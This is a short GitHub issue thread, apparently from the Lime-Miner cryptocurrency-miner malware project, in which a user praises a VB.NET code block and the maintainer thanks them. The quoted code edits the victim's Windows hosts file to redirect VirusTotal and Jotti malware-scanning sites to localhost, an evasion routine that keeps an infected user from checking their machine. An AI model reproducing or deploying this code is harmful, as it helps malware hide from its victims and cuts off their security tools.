### ISSUE TITLE
Best Code Block i have ever seen

### ISSUE THREAD

**Issue by Chris-Devine** [NYAN-x-CAT/Lime-Miner#8]
'In case user is an idiot (need run as, use manifest)
        Try
            Dim path As String = "C:\Windows\System32\Drivers\Etc\Hosts"
            If IO.File.Exists(path) AndAlso Not IO.File.ReadAllText(path).Contains("virustotal") Then

                Dim appendText As String = "127.0.0.1    https://www.virustotal.com" + Environment.NewLine + "127.0.0.1    http://www.virustotal.com" + Environment.NewLine + "127.0.0.1    www.virustotal.com" +
                   Environment.NewLine + "127.0.0.1    https://virusscan.jotti.org" + Environment.NewLine + "127.0.0.1    virusscan.jotti.org" + Environment.NewLine + "127.0.0.1    www.virusscan.jotti.org"

                IO.File.AppendAllText(path, appendText)
            End If
        Catch ex As Exception
        End Try

**Comment by NYAN-x-CAT** [comment]
Thanks
